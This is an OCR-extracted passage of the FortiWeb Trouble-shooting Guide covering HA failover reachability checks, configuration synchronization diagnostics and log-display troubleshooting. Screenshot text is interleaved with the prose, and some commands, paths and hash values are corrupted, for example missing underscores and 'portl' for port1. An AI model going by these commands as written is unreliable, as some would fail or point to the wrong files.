o Check if PING can be successful or ICMP request can be captured on the new primary FortiWeb or the
upstream router

« Check if TCP 3-way handshakes can be successfully between the client and the new primary
FortiWeb

o Check if HTTP/HTTPS request can be captured on the new primary FortiWeb or the upstream router

o IFHTTP/HTTPS requests can be received by the new primary FortiWeb, check if the responses are
forwarded back to the upstream router or other intermediate network nodes

« Ifit's HA-AAHV mode, check in the same way to confirm if requests are received by the node to which the
VIP is distributed.

4. Verify the traffic distribution for Standard Active-Active (AAS) mode:

In AAS mode, the primary appliance distributes the traffic to all the HA members (including itself) according to
the load-balancing algorithm. The primary node starts distributing traffic to other nodes from the TCP
handshake stage, and will only maintain a distribution table to guarantee the following traffic in the same

connection is distributed to the same node, but not maintain sessions between the clients and the primary node
itself.

So in this situation, if traffic is distributed to a secondary node, troubleshooting needs to be performed on both
the primary node&adistributed secondary nodes:

« Capture packets to check if TCP SYN from client is received by the secondary node;
« Capture packets to check if TCP SYN ACK from the secondary node is received by the primary node;

« Capture packets to check if TCP SYN ACK from the secondary node is forwarded out to client by the
primary node;

« Capture packets to check if SSL/TLS session can be established between the client and the secondary
node in the same way;

« Capture packets to check if HTTP traffic is processed by the secondary node in the same way.

The below steps are the detailed troubleshooting methods for some of the above typical network reachable
problem after switch over:

5. Check if the VIP address is bound to the corresponding interface on the primary FortiWWeb node

~# ip addr show port2
6: port2: <BROADCAST,MULTICAST,UP, LOWER UP> mtu 1500 gdisc mg glen 1000
link/ether 00:09:0f:a0:2c:02 brd ff:ff:ff:ff:ff:ff
inet 192.168.101.101/24 brd 192.168.101.255 scope global port2
valid 1ft forever preferred 1ft forever
inet 192.168.101.100/24 brd 192.168.101.255 scope global secondary port2
valid 1ft forever preferred 1ft forever
inet6 fe80::20c:29ff:fee9:9600/64 scope link
valid 1ft forever preferred 1ft forever
FortiWeb 52 # show system interface port2
config system interface
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edit "port2"
set type physical
set ip 192.168.101.101/24
set allowaccess ping ssh snmp http https FortiWeb-manager
config secondaryip
end
config classless static route
end

next

end

FortiWeb 52 # show system vip
config system vip
edit "vIP 01"
set vip 192.168.101.100/24
set interface port2
set index 1
next
end

6. Verify that after switch over, the upstream router has its ARP table (or the switch refreshed its MAC table)
refreshed via gratuitous ARP sent out by the new primary FortiWeb node.

Both IP addresses on ports and VIPs will send gratuitous ARP. It's better to check the ARP table on the
upstream router, or the MAC table on the upstream switch.

7. Verify that network cables are working with the correct speed & duplex on the new primary FortiWeb node.

You can check the interfaces on FortiWWeb with the below backend command or on the peer router/switch with
corresponding diagnose commands.

~# ethtool portl

Settings for portl:
Supported ports: [ TP ]
Supported link modes: 1000baseT/Full

10000baseT/Full

Supported pause frame use: No
Supports auto-negotiation: No
Supported FEC modes: Not reported
Advertised link modes: Not reported
Advertised pause frame use: No
Advertised auto-negotiation: No
Advertised FEC modes: Not reported
Speed: 10000Mb/s
Duplex: Full
Port: Twisted Pair
PHYAD: O
Transceiver: internal
Auto-negotiation: off
MDI-X: Unknown

Cannot get wake-on-lan settings: Operation not permitted
Link detected: yes

8. Ifit's VM FortiWebs running in virtual environment, please check the extra configuration on hypervisors
according to above section "HA Key Settings > Extra configuration on hypervisors in VM environment”

9. If the issue still cannot be resolved, you can try to:
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Disable HA on the FortiWeb node and check if it can be visited with standalone configuration
Troubleshoot the issue in standalone mode

HA Synchronization issues

When you are using the HA function for two or more than two FortiWeb devices and the configurations are
different between the devices, the elected Primary device will synchronize almost all the configurations (except
the hostname, HA priority, etc.) and some system files to other Secondary devices. Normally, the devices will
get into the same HA group, and keep in sync, so the HA devices will work as what you want.

The basic synchronization principles:

FortiWeb Trouble-shooting Guide

HA group uses the heartbeat link to automatically synchronize most of their configuration and occurs
immediately when an appliance joins the group

During the synchronization process after an appliance just joins HA, its HA status will be INIT.

If the first sync fails, the primary will attempt to sync again for another 3 times (total 4 times). If the
appliance stays in the INIT status for a long time, it mostly indicates a synchronization failure.

After the first complete & successful sync, further configuration sync will be executed in every 30 seconds
and just based on configuration diffs.

After HA is established, each HA member will generate a MD5 for SYS files and CLI config files. These two
MD5 will be identical if the configuration & data are synchronized successfully between the primary and
secondary appliances.

The secondary appliance will receive both the synchronized configuration/data and the primary device’s
two MD5 values; after it loads the synchronized configuration, it will calculate its own MD5 values and
compare with the primary node’s, then judge if the synchronization is successful and complete

Configuration synchronization uses TCP on port number 6011 and a reserved |IP address (169.254.0.0/16)
Synchronization includes: (show in “diagnose sys ha sync-stat” and “diagnose system ha file-stat”)

« Core CLlI-style configuration file (/migadmin/etc/cli_syntax.xml -> ha_not_sync="2" will not sync)

« X.509 certificates, certificate request files (CSR), and private keys

o HTTP error pages

« FortiGuard IP Reputation Service database

« FortiGuard Security Service files (attack signatures, predefined data types & suspicious URLs, known
web crawlers & content scrapers, global allow list, vulnerability scan signatures)

« FortiGuard Antivirus signatures
« Geography-to-IP database
Configuration settings that are not synchronized:

« Network interface (IP addresses on interfaces in Active-Active-High-Volume mode, and IP address on
the reserved-mgmt-interface in Active-Passive & Active-Active-Standard modes are NOT
synchronized)

» V-zone (Configured in Transparent Proxy & Transparent Inspection modes)
« Firewall (Configured in Active-Active-High-Volume mode)
« Static/Policy route (Configured in Active-Active-High-Volume mode)
« HA static/policy route (Configured in Active-Passive and standard Active-Active modes)
o RAID level
« HA active status and priority
Data that is not synchronized: (Please check the Admin Guide for details)
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« HTTP sessions (In Active-Active-Standard mode, session pickup can be enabled)

o HTTPS sessions
« Log messages
o Generated reports

« Machine Learning data: will not be synchronized in Active-Active-Standard & Active-Active-High-

Volume mode; but will be synchronized in Active-Passive mode in every 10 minutes)
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However, some errors could happen and the devices could not be in sync status at some times.

FortiWeb provides several methods to troubleshoot the HA configuration synchronization issues:

1. Verify that the heartbeat packet Ethertype is correctly configured and allowed by intermediate switches via
which if the heartbeat interfaces of HA members are connected.

« HA uses Ethertype 0x8893 to synchronize HA configuration, so the switches used to connect heartbeat
interfaces require a configuration that allows them.

« The Ethertype for level2 frames can be configured between 0x8890 and 0x8893.

« You can use “diagnose network sniffer <hbdev>" to capture packets and see if such packets are sent &
received from both HA nodes

2. Use the HA Diff Toolbar to check the HA status and configuration Diff on GUI.

On 6.4.1 and later releases, FortiWeb adds a new toolbar to show the HA sync status in the toolbar. If the HA
devices are not synchronized, the menu will be clickable. After you click the ‘Not sync’ menu, it will prompt one
slide page on the right and show the HA differences between the Primary and first different Secondary device.
In other words, if you have more than one Secondary devices which are all not synchronized with the Primary
device, this new tool will only show the first Secondary difference. After you fix the first Secondary difference, it
will show the next difference.

2.5 FortiWeb-VM Fortiweb

HA: Insync

18 FortiView

£ System ~ .
U System Information
Status @
HA Status
Status
Policy Status Cluster Name
Network N Cluster Members
Firewall >
Config >
(R OAEERTRy > Serial Number
Admin 4 Operation Mode
Maintenance > <
System Time
NX Security Fabric >
N Firmware Version
>

& User

Please note that this HA Diff Tool is only effective on the Primary device.

HA Sync Status on GUI:

Status

Standalone

Wait to sync

In sync
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c R i
Active-Active-Standard
Group_AAS
FortiWeb/
FVVMO08TM21000613

(Primary)
FWB_52/ FVWM04TM21001050
(Secondary)
FVVMO08TM21000613
Reverse Proxy

Sun Dec 26 23:23:12 2021

FortiWeb-VM
6.42,build1475(GA),211111

Description

No HA mode enabled and Standalone mode

now

Found the Secondary device, not sure about
the sync status, please wait some minutes to

Licenses

© VM License

©@ Support Contract
@ Security Service

© Antivirus

@ IP Reputation

@ Cred: tuffing Defense

check the sync status

All the HA devices are in sync status

Q

System Resources

CPU Usage

Memory Usage

Log Disk Usage

Log Disk Status
Database Status

Total Connections

Total Connections / Second

o o O 0

Clickable
No

No

No
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Status Description Clickable

Not sync At least one or more Secondary devices are Yes
not sync with the Primary node. You can click
this menu and show the differences between
Primary device and first different Secondary

device
Secondary Current HA device is a secondary node No
INIT Available on the secondary device when the No

device just joins HA group and during
synchronizing configuration from the primary
node

Note: When the Secondary device joins a HA cluster for the first time, HA status may show as ‘Not sync’. You
may not get a difference report when clicking ‘Not sync’ at this time because the secondary device is converting
the configuration received from the primary node.

Depending on the size of configuration files, it'll take several minutes to complete converting the configuration.
Examples 1: Configurations not sync

In the figure below, the Virtual IP configurations are different between the two HA devices. You can modify or
remove the differences in the Primary device. Otherwise, you need to backup the entire configurations
respectively and contact us.
HA: NotsyncA >- [31 ® : admin~
HA Diff x

Context Lines = 10 Range: 1~500
Apply & Refresh

Files changed (1)
/tmp/hadir/ha_compare/{ha_conf_local — ha_conf_peer} 42 -2

B /tmp/hadir/ha_compare/{ha_conf_local — ha_conf_peer} [RenaeD)

set vip 16.8.3.22/24 set vip 16.8.3.22/24
set interface port7 set interface port7
set index 1 set index 1
next next
edit "vip3" edit "vip3"
set vip 36.33.33.33/24 set vip 36.33.33.33/24
set interface port7 set interface port7
set index 2 set index 2
next next
edit "myvip3" edit "myvip3”
- set vip 10.10.10.18/24 33 | + set vip 10.10.10.11/24
= set interface portd 24 + set interface portS
set index 3 set index 3
next next v
Return

Examples 2: System files not sync

In the figure below, the files ‘/data/etc/ssh/mytest’ are different between the two HA devices
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set override enable
set hbdev port2

filename: /data/etc/m-learning/svm2/svm-xss-gene
filename:/data/etc/m-learning/svm2/svm-xss-gene
filename:/data/etc/saml/shibboleth/service_provider
filename:/data/etc/saml/shibboleth/service_prov
filename:/data/etc/wvs/profile/
filename:/var/log/maxminddb/
filename: /var/log/maxminddb/GeoIPv4_country.mmc
filename: /var/log/maxminddb/GeoIPvé_country.mme
filename:/var/log/logo/
filename:/data/etc/ssh/

HA: NotsyncA >- 1 @ ‘ admin~

set override enable
set hbdev port2

filename:/data/etc/m-learning/svm2/svm-xss-gene
filename:/data/etc/m-learning/svm2/svm-xss-gene
filename: /data/etc/saml/shibboleth/service_provider
filename:/data/etc/saml/shibboleth/service_prov
filename: /data/etc/wvs/profile/
filename:/var/log/maxminddb/
filename: /var/log/maxminddb/GeoIPv4_country.mmc
filename:/var/log/maxminddb/GeoIPvé_country.mmc
filename: /var/log/logo/
filename:/data/etc/ssh/
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+ filename:/data/etc/ssh/mytest
filename:/data/etc/ssh/ssh_host_dsa_key
filename: /data/etc/ssh/ssh_host_dsa_key.pub
filename:/data/etc/ssh/ssh_host_rsa_key
filename: /data/etc/ssh/ssh_host_rsa_key.pub

filename:/data/etc/keytab/

filename: /data/etc/xml_schema/

filename:/data/etc/json_schema/
filename:/data/etc/json_schema/json_schema/REAC

filename:/data/etc/xml_wsdl/

filename:/data/etc/cert/tslca/

5316 | - filename: /data/etc/ssh/mytest
531 filename: /data/etc/ssh/ssh_host_dsa_key
filename: /data/etc/ssh/ssh_host_dsa_key.pub
filename: /data/etc/ssh/ssh_host_rsa_key
filename: /data/etc/ssh/ssh_host_rsa_key.pub
filename:/data/etc/keytab/
filename:/data/etc/xml_schema/
filename:/data/etc/json_schema/
filename: /data/etc/json_schema/json_schema/REAL
filename:/data/etc/xml_wsdl/
filename:/data/etc/cert/tslca/

Return

Examples 3: Configurations not sync

In the figure below, although the menu show “Not sync”, when you click it the HA diff page shows “There is no
difference between the HA devices.”

HA: NotsyncA >~ (3 @ ‘ admin
HA Diff x

There s no different between the HA devices.

Return

This is because when the Primary device gets the Secondary device not sync status, the Primary device will
synchronize the full configurations and some system files to the Secondary, then the Secondary node will
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receive these files and apply them. This process will also take some time. After the full synchronization, the HA

devices are in sync status. Wait a minute, the HA difference menu will show ‘In sync’ status.

If there are lots of differences between the two HA devices, it could take long time to show the differences.
Please wait patiently. If you always fail to get the difference for the not sync status or some errors happen when

using the HA difference tool, you have other options to check the HA differences.

3. Check the Event log to confirm that HA synchronization failure events and the cause.

Log & Report > Log Access > Event > Action: HA-Synchronize.

E.g. Logs will show synchronization fails as below:

& System

4 Security Fabric

i FortiView

& User

2 Policy

£ Server Objects

«§ Application Delivery

@ Web Protection

8 FTP Security

2 Bot Mitigation

2 API Protection

U DoS Protection

B |P Protection

9 Tracking

= Machine Learning

@ Web Vulnerability Scan
Iﬂ Log&Report

Log Access

Attack

S5 FortiWeb-VM Fortiweb

>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>

© N o v s @ N e

HA: Insyne >— I3 @ (@) admin~

2 | | [% Action: HASynchronize OR NOT [© Add Filter

| | SavedFilter~ &

Date/Time
2021/12/26 00:25:53
2021/12/26 00:24:00
2021/12/26 00:13:14
2021/12/26 00:08:00
2021/12/26 00:07:33
2021/12/25 23:44:38
2021/12/25 23:44:13

2021/12/25 23:44:11

Level

User Interface
daemon

sshd

daemon
daemon
daemon
daemon
daemon

daemon

Action Message
HA-Synchronize  HA synchronize contract file to secondary device FVWMO4TM21001050 success.
HA-Synchronize  User admin synchronize all configuration files to standby device from ssh(172.30.212.70)

HA-Synchronize HA update image from primary : FVWM04TM21001050

HA-Synchronize [HA synchronize contract file to secondary device FVWMO04TM21001050 fails. ]

HA-Synchronize  HA update contract file from primary : FYVM04TM21001050

HA-Synchronize  HA synchronize contract file to secondary device FVVMO4TM21001050 fail. ]

HA-Synchronize  HA update the full configuration from primary : FVWM04TM21001050

HA-Synchronize  HA update contract file from primary : FYVM04TM21001050

4. Use diagnose commands to check the HA sync status and detailed sync data/files on nodes.

If sync failure occurs, the MD5 values on different nodes might be different, and the cfg_state will not be In sync;

also, “diagnose system ha sync-stat” will show detailed data or file sync failures.

FortiWeb # diagnose system ha confd status
HA information

Model=FortiWeb-VM 7.00,build0044 (Interim),211223,

Group=11

HA group member information:
FVVM04TM21001050

LocalSN:

member cnt:
msg _queue:0 file queue:0 md5 rep ignore:0 do md5sum:39

FVVM04TM21001050¢:

pending:0

FVVM08TM21000613:
pending:198485

2

Primary

update:0
SYS: DO75A17ADDD372423263F4B31ACB8CTF
CLI: 2D1DE97COC1lF1968FB4BFCE530E52A1B

Secondary
update:198486 time:198486 sync:0

is manage master=1. cfg state:In sync

confd

time:0 sync:0

SYS: DO75A17ADDD372423263F4B31ACB8CTF
CLI: 2D1DE97COC1lF1968FB4BFCE530E52A1B

FortiWeb
The sync

FortiWeb
FortiWeb

Last Update Time:

# diagnose system ha sync-config get-status
config status is enable.

# diagnose system ha file-stat
Security Service:
2022-11-30

2021-12-25 Method: Scheduled

Signature Build Number-0.00308

FortiWeb Trouble-shooting Guide

Mode=active-active-standard

cfg state:In sync

cfg state:In sync
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FortiWeb Antivirus Service:
2022-11-30
Last Update Time: 2021-12-25 Method: Scheduled
Regular Virus Database Version-89.08105
Extended Virus Database Version-89.07977
FortiWeb IP Reputation Service:
2022-11-30
Last Update Time: 2021-12-25 Method: Scheduled
Signature Build Number-4.00727
FortiWeb Geodb Service:
Last Update Time: 2021-12-25 Method: Scheduled
GEO Datase Build Number-Fortiweb-Country-Build0107 2021-12-03
FortiWeb Credential Stuffing Defense Service:
2022-11-30
Last Update Time: 2021-12-25 Method: Scheduled
Signature Build Number-1.00351
System files MD5SUM: DO75A17ADDD372423263F4B31ACB8CTF
CLI files MD5SUM: 2D1DE97COCl1F1968FB4BFCES530E52A1B

FortiWeb # diagnose system ha sync-stat

Image INIT

Config INIT

System INIT

CLI INIT

Signature SUCCESS

GeoDB SUCCESS

AV SUCCESS
IpReputation SUCCESS
HarvestCredentials SUCCESS

HA sync-stat showed above:

Status Description

INIT Last synchronization completed; system is ready and waiting for next
synchronization.

SENDING Synchronization is in process; data is sending.
SUCCESS Success in data sending; synchronization is complete.
SEND_TIMEOUT Data sending timeout; synchronization is incomplete.

5. Use “diagnose system ha backup-config” to check the synchronized configuration

Use this command to export the configuration file of the HA nodes. It only backs up the configurations
synchronized between HA nodes. You can use this command to compare the configuration files between the
HA nodes and check which part of the configuration is not synchronized as expected.

FortiWeb # diagnose system ha backup-config

<id> please input peer box index.

<1> Subsidary unit FVVM08TM21000613

<2> Subsidary unit FVVM04TM21001050

FortiWeb # diagnose system ha backup-config 1

Config file /var/log/gui upload/ha config 1 20211227002455.tgz has been backed up.
Please download it from System->Maintenance->Backup&Restore by GUI.
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FortiWeb # diagnose system ha backup-config 2
FortiWeb #

Then you can check the System > Maintenance > Backup & Restore page, and you will see the GUI file
Download/Upload part. Please download the files as the below, it will be very helpful for locating the issue.

272 Fortiweb-VM Fortiweb

& System - Backup &Restore | FTPBackup  Local Backup & Restore

Status
[ e el Back up CLI configuration | Back up Web Protection Profile related configuration
Include Machine Learning Data (B

Network.

Firewall
Encryption @
Config i

. P Backup
High Availability

Admin

< v|vv|v|v|v

Maintenance

Backup &Restore GUI File Download/Upload

Firmware
Clear All
System Time

Debug Partition Last Modify Time Size Delete Compress Download
3 Security Fabric > ||| debug_out_d_cond_cpush.ixt Mon Dec 2700:30:11 2021 3558 KB 8 # &
i FortiView > || debug_out d_procsh.txt Mon Dec 27 00:30:11 2021 2637 K8 o} » £
& User > || debug_out d_memshixt Mon Dec 2700:30:11 2021 32978 o] * &
g
Poli >
# Poliey debug_out d_netsh.txt Mon Dec 2700:30:11 2021 892KB B # &
£ Server Objects >
debug_disktxt Mon Dec 2700:30:10 2021 202.64K8 8 * &
+
ApplicationDelivery >
ha_config_1.20211227002455.g2 Mon Dec 2700:24:56 2021 9.00KB 8 # @
& Web Protection >
ha_event.log SunDec 26 15:44:57 2021 122MB B . &
™ FTPSecurity >
. . .
4 Bot Mitgation o || pertaata SunDec2600:15:22 2021 9.38 M8 B &
s . .
= APl Protection 5 || peridataold Sat Dec 25 23:44:43 2021 9.81M8 B &
© Dos Protection » || diog_logd SunDec2600:15:07 2021 0008 8 * &

6. Download the backup configuration files and compare them manually.

When configuration not sync occurs, the primary system will archive the current configuration files & the md5 for
each domain. You can check and compare them for details.

Depending on the cause of difference (SYS files or CLI configuration), the archive files will be named as “ha_
config_cli_xxx” or “ha_config_sys_xxx”.

Partition Last Modify Time Download
ha_config_cli_48C67FBSACD95A86C53C58E15858A415_1630523297_2_20210901110819.tgz Wed Sep 1 19:08:21 2021 K
ha_config_cli_4411C8285E309E2C6D5ADB3C42673CBE_1630523297_1_20210901110817 tgz Wed Sep 119:08:19 2021 L

Partition Last Modify Time Download
ha_config_sys_19327B246BE682964D42C4E87E5D018B_1630523819_2 20210901111701.tgz Wed Sep 1 19:17:04 2021 &
ha_config_sys_6162844003160AFFD01446F98CD0D918_1630523819_1_2021090111165%.tgz  Wed Sep 1 19:17:01 2021 &

6. Manually execute ha synchronize.

When you find HA sync failures, you can try to execute ha synchronization manually and see if the problem can
be resolved.

FortiWeb # execute ha synchronize

cli CLI configurations

sys System configurations

all CLI & System configurations

avupd antivirus definition, scan engine and proxy update
geodb GEO db file

scanner scanner integration file

FortiWeb # execute ha synchronize cli
starting synchronize with HA primary..

The secondary appliance will log the synchronization process:
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FortiWeb-VM FWB_52

Saved Filter = T

& System > |[ 2 || [0 addFiter
3 security Fabric >
# Date/Time

& FortiView >
& User .16 2021/12/2700:47:55
B policy s |7 2021/12/27 00:47:48
& Server Objects Nk 2021/12/27 00:47:48
+ Application Delivery >|9 2021/12/27 00:47:48
@ Web Protection > |10 2021/12/27 00:47:48
W FTP Security >l 2021/12/27 00:47:32
& Bot Mitigation > |12 2021/12/27 00:00:21
+ APIProtection > |13 2021/12/27 00:00:10
U DoSProtection > (14 2021/12/26 23:41:59
& 1P Protection ES 2021/12/26 23:41:57

o il >
Tracking 16 2021/12/26 23:41:56

= Machine Learning >
17 2021/12/26 23:23:24

@ Web Vulnerability Scan >
18 2021/12/26 22:01:13

|m Log&Report v
19 2021/12/26 22:00:11

Log Access v
20 2021/12/26 20:0021

Attack e

2021/12/26 20:0007

I

Log&Report issues

User Interface

system
daemon
system
system
system
daemon
daemon
daemon
sshd
sshd
sshd
Gul
daemon
daemon
daemon

daemon

Action
import

purge

start

import

restore
HA-Synchronize

HA-Synchronize
HA-Synchronize
edit

login

login

login
HA-Synchronize
HA-Synchronize
HA-Synchronize

HA-Synchronize

Message
Imported machine learning data successfully

The cache flushis enabled, flush cache at intevals.

Backup daemon started

Startimporting machine learning data

Restored the configuration success.

HA update the cli configuration from primary : FVWMOBTM21000613

HA update virus engine and virus database from primary : FVVMOBTM21000613
HA update contract file from primary : FVWM08TM21000613

Command failed: "£#Fsh" Return code -90: CLI parsing error.

User admin logged in successfully from ssh(172.30.212.73)

User admin logged in successfully from ssh(172.30.212.73)

User admin logged in successfully from GUI->HTTPS(172.30.212.73)

HA update virus engine and virus database from primary : FVVMOBTM21000613
HA update contract file from primary : FVWM08TM21000613

HA update virus engine and virus database from primary : FVVM0BTM21000613

HA update contract file from primary : FVWMO08TM21000613

« Common troubleshooting methods for issues that Logs cannot be displayed on GUI on page 152
« Step-by-step troubleshooting for log display on FortiWeb GUI failures on page 158

« Logs cannot be displayed on FortiAnalyzer on page 160

Common troubleshooting methods for issues that Logs cannot be displayed

on GUI

This section summarizes the common troubleshooting methods for log related issues such as
Attack/Traffic/Event logs not generated or displayed on GUI. The following sections will use these methods to
actually locate specific issues step by step.

1. Check if the security level in log disk is configured properly on CLI or GUI.

Take below configuration for example, only the log messages with a severity of Warning or higher will be

recorded.

FortiWeb # show full-configuration log disk

config log disk
set status enable
set severity warning
set diskfull overwrite
end

FortiWeb Trouble-shooting Guide
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Global Log Settings

& © Disk

Log Level Information h
When log disk is full | Emergency
Alert
Critical
& © Syslog Error
Syslog Policy | Defal"Notification
Log Level Inforr jon
- Debug

Please note: Log level of traffic log is Notification and log level of attack log is Alert.

2. Double check if log options are enabled correctly:

« Make sure global log options are enabled via GUI or CLI as below:
FortiWeb # show full log event-log
config log event-log

set status enable
end
FortiWeb # show full log traffic-log
config log traffic-log
set status enable
end
FortiWeb # show full log attack-log
config log attack-log
set status enable
end

« On6.4.16, 7.0.0 and later releases, traffic log is disabled by default and can be enabled or disabled

per server-policy policy via CLI:
FortiWeb # show full-configuration server-policy policy
config server-policy policy
edit "sp 01"
set tlog enable
next

3. Check iflogd, indexd and mysqld work normally in backend:
Sometimes logs fail to be displayed are caused by log related daemons instability such as coredump.

There are several ways to judge if these three daemons every restarted abnormally:

« Check the PID number of related daemons. The PID of logd and mysqld are usually a small 4-digit one like
below, so if the PID becomes a big number, it may indicate the daemon ever restarted.
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« Check the PID of the 3 daemons several times to make sure they are stable (PID is not changing). If the
PID of the daemons is changing, it indicates the daemon ever restarted or the administrator ever executed
“execute db rebuild”.

# ps | grep logd

1479 root 4508 S /bin/syslogd -n -b 99 -s 500
1480 root 4508 S /bin/klogd -n
1502 root 308m S /bin/logd #1502 is the PID of logd
1729 shell 4508 R grep logd
# ps | grep indexd
2133 shell 4508 S grep indexd
18411 root 55840 S /bin/indexd #18411 is PID of indexd
# ps | grep mysqgld
1584 root 773m S /bin/mysgld --defaults-file=/data/etc/mysql/my-
fortiweb.cnf --skip-grant-tables --user=root #1584 is PID of mysgld
2139 root 0 Z [mysgld monitor.]
2328 shell 4508 S grep mysqgld

« Another way is to check .NMON files. The PID of daemons are recorded in each .NMON file > TOP.
Please refer to Retrieving system logs in backend system to see how to analyze .NMON files.
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3703 90237] 5031 41 3 11 3730272 1420388 19056 1752736 8736 0 ofmysqld 37 0 010 1771792
3704 907:37|  s031] 3.8 3.00 096 3730272 1420388 19056 1752736 8736 0 ofmysqld 37 0 010 1771792
3705 9:1237]  s031] 406 3.07 099 3730272 1420388 19056 1752736 8736 0 ofmysqld 37 0 010 1771792
3706 9:17:37]  s031] 401 296 105 3730272 1420388 19056 1752736 8736 0 ofmysqld 37 0 o010 1771792
3707 92237|  s031] 405 299 105 3730272 1420388 19056 1752736 8736 0 ofmysqld 37 0 o010 1771792
3708 927:37|  s031] 402 294 108 3730272 1420388 19056 1752736 8736 0 ofmysqld 37 0 010 1771792
3709 93237|  s031] 404 297 107 3730272 1420388 19056 1752736 8736 0 ofmysqld 37 0 010 1771792
3710 937:37]  s031] 404 296 108 3730272 1420388 19056 1752736 8736 0 ofmysqld 37 0 010 1771792
3711 94237 5031 41 3 109 3730272 1420388 19056 1752736 8736 0 ofmysqld 37 0 010 1771792
3712 947:37] 5031|405 296 108 3730272 1420388 19056 1752736 8736 0 ofmysqld 37 0 o010 1771792
3713 9s237]  s031] 406 299 107 3730272 1420388 19056 1752736 8736 0 ofmysqld 37 0 010 1771792
3714 9s7:37]  s031| 408 297 111 3730272 1420388 19056 1752736 8736 0 ofmysqld 37 0 010 1771792
3715 100237] 5031 556 4ds 11 3730272 1421180 19056 1753456 8736 0 ofmysqld 37 0 014 177512
3716 1007:38]  s031| 408 3 108 3730272 1421180 19056 1753456 8736 0 ofmysqld 37 0 010 1772512
3717 10:12:38]  s031] 409 301 108 3730272 1421180 19056 1753456 8736 0 ofmysqld 37 0 010 1772512
3718 10:17:38]  s031] 403 299 104 3730272 1421180 19056 1753456 8736 0 ofmysqld 37 0 010 1772512
3719 102238]  s03:1| 4 3 112 3730272 1421180 19056 1753456 8736 0 ofmysqld 37 0 010 1772512
3720 1027:37]  s031| 412 297 114 3730272 1421180 19056 1753456 8736 0 ofmysqld 37 0 010 1772512
3721 103237]  s031] 406 298 108 3730272 1421180 19056 1753456 8736 0 ofmysqld 37 0 010 1772512
3722 1037:37]  s031] 401 295 106 3730272 1421180 19056 1753456 8736 0 ofmysqld 37 0 010 1772512
3723 1042:37]  s031] 413 3.02 111 3730272 1421180 19056 1753456 8736 0 ofmysqld 37 0 010 1772512
3724 1047:37] 5031|568 454 114 3730272 1421180 19056 1753456 8736 0 ofmysqld 37 0 014 177512
37250 10:52: 031 447 3.23 1.19 3730272 1421180 19056 1753456 8736 0 el 37 ] 0111772512 A
« » ~.| JFSFILE | MEM | NET | NETPACKET | PROC | Sheet62 | TOP | VM | ZZzZ | CPUOOT | CPUOD2 | CPUOD3 | CPUOC - (@ : [« >

« Ifyou find logd daemon of kernel coredump files, please download them and deliver to R&D for further
investigationAnother way is to check.
Please note: logd coredump need to be enabled with the following command in backend shell: (please refer
to "Run backend shell commands' in this guide)
/# touch /var/log/debug/logrpt core flag
Please refer to "Customize & Download debug logs” in this guide to see how to download coredump files.

4. Use diagnose commands to check logds outputs:
“diagnose debug application logd” is very useful to help find the cause for log related issues.

Hereby we’ll provide several specific case/examples:

« When no useful log is printed out when diagnose is enabled, it usually means no logs are sent to logd

by other function modules.
FortiWeb # diagnose debug application logd 7
FortiWeb # diagnose debug timestamp enable

FortiWeb Trouble-shooting Guide Fortinet Technologies, Inc.



Diagnose software function issues 155

FortiWeb # diagnose debug enable

##When either the global traffic-log or per server-policy traffic log option
is disabled, there will be no useful diagnose information:

VM 01 # [Logd] [11-22-16:29:12] [INFO] [ log try push][436]: log try push 10
times

##If traffic log is enabled, there will be diagnose info like below:

VM 01 # [Logd][11-22-16:39:27][INFO][ log process][383]: ###### Recv a traffic
log

[Logd] [11-22-16:39:27] [INFO] [log format local msg][512]: log id=30001000, msg
1d=000000001063, subtype=https, url=/

[Logd] [11-22-16:39:27] [INFO] [log_format local msg][578]: Local Detail =
v0llxxxxdate=2021-11-22 time=16:39:27 log id=30001000 msg_ id=000000001063
device i1d=FVVM04TM21000715 vd="root" timezone=" (GMT-7:00)Mountain Time
(Us&Canada)" timezone dayst="GMTb+7" type=traffic subtype="https"
pri=notice proto=tcp service=https/tlsl.2 status=success reason=none
policy="SP 02 RS SSL" original src=172.30.213.248 src=172.30.213.248 src_
port=3067 dst=10.159.37.11 dst port=443 http request time=0 http
response_time=0 http request bytes=82 http response bytes=927 http
method=get http url="/" http agent="curl/7.78.0" http retcode=200
msg="HTTPS get request from 172.30.213.248:3067 to 10.159.37.11:443"
original srccountry="Reserved" srccountry="Reserved" content switch
name="none" server pool name="Pool HTTPS" http host="test.vm02.com:8002"
user name="Unknown" http refer="none" http version="1l.x" dev
id=B039BB143F81FCEBE2C39ACC361EE9411534 cipher suite="TLS ECDHE RSA WITH
AES 256 GCM_SHA384"

[Logd] [11-22-16:39:27] [WARNING!] [log format msg][1718]: No srv need to send

[Logd] [11-22-16:39:27] [INFO] [ log process] [403]: Begin to write disk.

[Logd] [11-22-16:39:27] [INFO] [ log process] [409]: Begin to write packet.

[Logd] [11-22-16:39:27] [INFO] [ log add pkt][545]: packet log cache 1 logs
stored

[Logd] [11-22-16:39:27] [INFO] [ log process] [412]: Process done.

[Logd] [11-22-16:39:27] [INFO] [log disk push][988]: push tlog 915

[Logd][11—22—16:39:27][INFO][_log_write_disk][622]: Open existing log file
'/var/log/fwlog/root/disklog/tlog(2021-11-22-16:39:27) .1log' with link

[Logd] [11-22-16:39:27] [INFO] [write cache to file][277]: cur cnt: 3 start pos =
1744,1len = 915,currnet len = 2659

[Logd] [11-22-16:39:27] [INFO] [write cache to file] [337]: Write log item Traffic
log 1 msg _id 000000001063 start offset : 2659 length : 915

[Logd] [11-22-16:39:27] [INFO] [write cache to file][347]: cur log cnt : 4,cache
type = Traffic log cache count : 1

« Sometimes one may be not sure about the severity of specific attack/traffic logs, you can use the

diagnose commands to debug:

FortiWeb # diagnose debug application logd 7
FortiWeb # diagnose debug timestamp enable
FortiWeb # diagnose debug enable

Sample diagnose output:

[Logd] [10-18-12:47:02] [WARNING!] [log disk write] [921]: Disk log rejected! t:2,
s:1, 4 < 5? h->category : 2

[Cause] The traffic log level is notification but disk log severity is set as Warning, so logs are not

recorded to local disk.

[Explanation] Both t:2 & h->category : 2 mean traffic log; s:1 means log is enabled to write to disk; 4 <

5 means current severity level is 5 (Notification), while the current log severity is 4 (Warning).

5. Check backend logs:
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Usually diagnose output will show most useful debug information, while sometimes we need to double check
or find the root cause via more detailed backend logs or counters.

« /var/log/dlog_indexd

We can use realtime output with “tail - or “grep” with keywords such as “can't connect”, “error” or “mysqld
segment fault” to check if there are any obvious defaults in dlog_indexd.

Example 1:
“MySQL server has gone away” means mysgl server used by logd cannot be connected,
so logs cannot be recorded successfully.
/# tail -f /var/log/dlog indexd
/var/log/fwlog/root/disklog/alog(2021-11-15-14:01:53) .1og has no mapping entry
